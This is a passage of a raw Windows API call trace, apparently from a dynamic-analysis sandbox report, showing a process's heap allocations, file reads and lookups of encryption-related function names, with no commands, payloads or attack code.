(HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0d020 [0109.168] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0109.168] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x10000, lpOverlapped=0x0) returned 1 [0109.172] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x503, lpOverlapped=0x0) returned 1 [0109.172] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0109.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0109.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0109.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0109.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0109.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10503) returned 0x4516010 [0109.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0109.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0109.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0109.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0109.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0109.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0109.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10503) returned 0x4526520 [0109.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0109.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0109.178] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0109.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0109.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0109.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0109.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0109.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0109.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10503) returned 0x4516010 [0109.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0109.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0109.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0109.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0109.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0109.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0109.178] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0109.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0109.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0109.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0109.179] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0109.179] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0109.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0109.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2920 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10503) returned 0x4516010 [0109.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0109.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2730 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0109.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b00 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0109.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29a0 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0109.180] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0109.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10503) returned 0x4536a30 [0109.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0109.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0109.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0109.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0109.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0109.182] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0109.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0109.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0109.182] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0109.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0109.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0109.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0109.183] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0109.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0109.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0109.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0109.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0109.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0109.184] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0109.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0109.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0109.184] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0109.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0109.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0109.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0109.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0109.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0109.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0109.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0109.185] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0109.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0109.212] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0109.213] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0109.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0109.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0109.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0109.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0109.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0109.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0109.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0109.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0109.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0109.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0109.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0109.280] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0109.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0109.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0109.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0109.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0109.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0109.280] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0109.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0109.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0109.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0109.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0109.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0109.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0109.281] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0109.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0109.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0109.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0109.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0109.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0109.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: 